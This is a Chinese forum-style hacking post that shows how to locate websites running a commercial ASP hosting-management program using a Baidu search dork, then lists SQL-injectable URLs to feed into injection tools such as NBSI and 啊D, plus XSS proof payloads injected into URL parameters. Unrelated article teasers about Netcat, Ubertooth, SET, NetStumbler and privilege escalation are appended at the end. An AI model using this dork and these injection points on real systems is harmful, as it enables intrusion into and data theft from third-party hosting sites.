作者:qingran
首先百度搜索关键字:inurl: (mmdatabase.asp)
我随便列举一个: www.xxxx.com
修改链接:http://www.xxxx.com:80/Style/news.asp?action=true&RID=1&ID=1
扔入NBSI 或者啊D等各种 *** 工具中
SQL:
http://www.xxxxxx.com:80/Style/flashad/flashad.asp?adid=1
http://www.xxxxxx.com:80/Manage/CreateHost.asp?Url=/Style/memberlogin.asp&PID=11
http://www.xxxxxx.com:80/Manage/CreateMySQL.asp?Url=/Style/memberlogin.asp&PID=9
http://www.xxxxxx.com:80/Style/vhosting.asp?classID=2
XSS证明:
http://www.xxxxxx.com:80/Manage/CreateHost.asp?PID=11&Url=/Style/memberlogin.asp";alert(42873);"
http://www.xxxxxx.com:80/Manage/CreateMySQL.asp?PID=9&Url=/Style/memberlogin.asp";alert(42873);"
http://www.xxxxxx.com:80/Style/domainInquiry.asp?dfcn=true?cndns=88888&button4=88888&checkbox2=.bj.cn<script>alert(42873)</script>
由此可见点就是坑逼中的战斗机 自从用了他我的眼泪都流干了 有做IDC的朋友千万别步我后尘啊 便宜没好货好货不便宜
还是星外吧 你们懂的
作为一个商用程序 安全如此堪忧甚至于连网上开源的一些程序都有所不如,这样的公司能走多远?
PS:其实我真的很想知道你说N点这SB asp就asp吧 为什么asp还非要MSSQL 这不是好像告诉我们快来日吧我们很容易日的,裤子都脱啦,就等你啦。 o(︶︿︶)o 唉
什么叫Netcat? Netcat是一种用以根据UDP或TCP数据连接载入和载入数据信息的开源系统专用工具。它被建立为一个后端开发专用工具,立即由别的专用工具或脚本制作应用。Netcat在2001年...
Ubertooth One是一款开源系统手机蓝牙扫描仪嗅探器,当然,还可以扫描仪网络嗅探低能耗手机蓝牙,Ubertooth One是适用手机蓝牙试验的开源系统2.4 GHz无线网络软件开发平台。 手...
Social Engineer Toolkit 翻译中文可称:社会发展技术工程师工具箱; 什么是社会技术工程师工具箱? 由TrustedSec的创办人编写,社交媒体技术工程师工具箱(S...
什么叫NetStumbler? Netstumbler是用以搜索敞开式无线接入点的著名Windows专用工具之一。她们还派发了为PDA建立的WinCE版本号,并将其取名为MiniStumbler。N...
1、提权的定义:将系统软件管理权限提高到root、 system 或是 administrator。 2、在网上提权的界定:取得网络服务器管理权限,而且取得成功登录网络服务器。 可是,...
后台管理员是网站后台必不可少的一个环节,如何使用aspmaker实现超级管理与普通管理员登陆后台。下面就详细讲解一下。 第一步,首先打开一个已经设置好的aspmaker文件,在工具条中点击“...